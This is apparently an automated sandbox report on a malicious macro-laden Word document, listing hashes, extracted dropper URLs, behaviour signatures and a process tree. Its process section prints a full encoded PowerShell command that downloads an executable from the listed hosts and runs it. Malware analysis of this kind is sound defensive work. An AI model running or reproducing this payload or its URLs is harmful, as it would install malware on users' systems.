Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    01/06/2024, 07:28

General

  • Target

    89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118.doc

  • Size

    214KB

  • MD5

    89c008a6668cfced5c53f05f3e74b24e

  • SHA1

    dd74ab9468c242b2e380a2a94d3990df84adba93

  • SHA256

    7c8c775210220e5ceee72c0c7459877dbcb72068aa6011fa6a29f5e3fda1b5f8

  • SHA512

    fc87efa893d36b7285513840dd5a30988f0478078975f3bd38405d1f47b4ca8d1d8c2c8c1ceafbfe225f9998fdc38663c30ff607a475887e13f3118f72d764a1

  • SSDEEP

    3072:EEd93LpGo0aQLjaxQCF3tmKZQHkrL2VerQfcRoC:EEd2V6xQCpttQwLZQfI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://uat-essence.oablab.com/cEP88qz

exe.dropper

http://34.207.179.222/GPc2ykD

exe.dropper

http://204.236.197.55/ZmkN6EP

exe.dropper

http://107.23.200.84/EmllsJND2W

exe.dropper

http://radioviverbem.com.br/SZYTAZDa

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
      powersheLl -e JABXADcANABfAF8ANQAwAD0AKAAnAG4ANwAyACcAKwAnAF8AMQAnACsAJwA5ACcAKQA7ACQARgBfADQAXwA4ADAAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABHADcAMQAwADEAMwBfAF8APQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwAnACsAJwB1AGEAdAAtACcAKwAnAGUAJwArACcAcwBzACcAKwAnAGUAbgAnACsAJwBjAGUALgBvAGEAYgBsAGEAYgAuAGMAbwBtAC8AYwBFAFAAOAA4AHEAegBAAGgAdAAnACsAJwB0AHAAOgAvAC8AMwA0AC4AMgAwACcAKwAnADcALgAxADcAOQAuACcAKwAnADIAMgAnACsAJwAyAC8ARwBQACcAKwAnAGMAJwArACcAMgB5AGsAJwArACcARABAAGgAdAB0ACcAKwAnAHAAOgAvAC8AMgAwADQALgAnACsAJwAyADMANgAuADEAOQAnACsAJwA3AC4ANQA1AC8AWgBtAGsATgA2AEUAUABAAGgAdAB0AHAAOgAvAC8AMQAwADcALgAyADMALgAyADAAMAAuADgANAAvAEUAbQBsAGwAcwBKAE4AJwArACcARAAyAFcAQABoAHQAJwArACcAdABwADoALwAnACsAJwAvAHIAYQBkACcAKwAnAGkAbwB2AGkAdgBlAHIAYgBlAG0ALgAnACsAJwBjAG8AJwArACcAbQAuAGIAcgAvAFMAWgBZAFQAQQBaAEQAYQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABwAF8AOAAwADEANgA9ACgAJwBmACcAKwAnADkAMQA1ADUANgAxACcAKwAnADkAJwApADsAJABBADEAMQAwAF8AOQBfAF8AIAA9ACAAKAAnADEANwAnACsAJwA4ACcAKQA7ACQAaQBfADgANQBfAF8AXwAxAD0AKAAnAEYAMQAxADQAOAAnACsAJwBfACcAKwAnAF8AOAAnACkAOwAkAHMAOQA1ADAAOAAxADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAMQAxADAAXwA5AF8AXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAMgBfADIAXwAwADgAIABpAG4AIAAkAEcANwAxADAAMQAzAF8AXwApAHsAdAByAHkAewAkAEYAXwA0AF8AOAAwADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAaQAyAF8AMgBfADAAOAAsACAAJABzADkANQAwADgAMQAxACkAOwAkAEQANQBfADMAXwAwAF8APQAoACcAVgA3AF8AXwAwACcAKwAnAF8ANQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABzADkANQAwADgAMQAxACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcwA5ADUAMAA4ADEAMQA7ACQAaABfADMANgA3ADEAOAA9ACgAJwBGAF8ANwAxACcAKwAnADIAJwArACcANwBfAF8AJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOQA0AF8AXwAwADEANwA9ACgAJwBUADQAMwAnACsAJwA5ADgAXwAnACkAOwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      1d7082bf78f4b02d48bac14283a7531d

      SHA1

      6825383409795ff3f578b8e7fef257319762b334

      SHA256

      6a32a3ca910cfc5b5be0c493cd659f2fa63881859fa3a153a43a2309b485442e

      SHA512

      648fc0f5037405d3db7a72af8390ca0b6c850dd07a1a15b1425e0e1c023620862d047046f76bae35c5a080520ff53947c92f0d9fff27d6511785ac51b0f48e98

    • memory/812-140-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/812-139-0x000000001B530000-0x000000001B812000-memory.dmp

      Filesize

      2.9MB

    • memory/1268-17-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-9-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-28-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-122-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-110-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-75-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-62-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-61-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-50-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-39-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-98-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-86-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-73-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-0-0x000000002F661000-0x000000002F662000-memory.dmp

      Filesize

      4KB

    • memory/1268-16-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-13-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-15-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-12-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-11-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-14-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-10-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-7-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-8-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-2-0x000000007124D000-0x0000000071258000-memory.dmp

      Filesize

      44KB

    • memory/1268-6-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-145-0x000000007124D000-0x0000000071258000-memory.dmp

      Filesize

      44KB

    • memory/1268-146-0x0000000000280000-0x0000000000380000-memory.dmp

      Filesize

      1024KB

    • memory/1268-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1268-163-0x000000007124D000-0x0000000071258000-memory.dmp

      Filesize

      44KB